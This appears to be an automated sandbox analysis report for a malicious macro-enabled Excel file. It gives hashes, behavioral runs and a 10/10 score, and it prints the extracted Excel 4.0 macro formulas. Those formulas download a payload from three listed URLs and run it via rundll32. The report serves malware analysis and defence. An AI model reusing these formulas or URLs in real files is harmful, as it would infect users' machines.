General
Target: ?i=1ddhggdgp
Size: 83KB
Sample: 220522-f6b2msbbhn
MD5: 88add4c02ddd08f3920ea988f584120a
SHA1: 413cee3adb3c80e16e87a9d168846c480291772f
SHA256: 5431cd4c5693f99cd843792b98dcb1a50f26e42db66186aebd56c2ae8b0053b6
SHA512: c22114f39f7ed0d63de1f214d4e35c92612b07839051cefe801a486e5912e884843054bec9e46198f4f9d34c67ac67e508bf73a0a9cfcd63ec575dabc956cb0c
Behavioral task
behavioral1
Sample
?i=1ddhggdgp.xlsm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
?i=1ddhggdgp.xlsm
Resource
win10v2004-20220414-en
Malware Config
Extracted
http://www.crownpacificpartners.com/guglio/Rt4el/
http://nbp-c.com/ya/O0BO5vb3z1MkWcDOqV2/
http://rjmtel.com/wp-content/bYAiTvGo635qKITG6/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.crownpacificpartners.com/guglio/Rt4el/","..\erum.ocx",0,0)
=IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://nbp-c.com/ya/O0BO5vb3z1MkWcDOqV2/","..\erum.ocx",0,0))
=IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://rjmtel.com/wp-content/bYAiTvGo635qKITG6/","..\erum.ocx",0,0))
=IF('EWDFFEFAD'!E22<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")
=RETURN()
Targets
Score: 10/10